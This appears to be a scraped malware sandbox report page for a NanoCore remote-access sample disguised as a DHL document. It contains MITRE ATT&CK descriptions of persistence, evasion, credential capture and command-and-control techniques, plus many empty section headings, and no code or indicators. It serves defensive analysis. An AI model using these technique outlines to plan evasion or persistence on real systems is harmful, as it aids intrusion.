Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report DHL_document1102202068090891.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre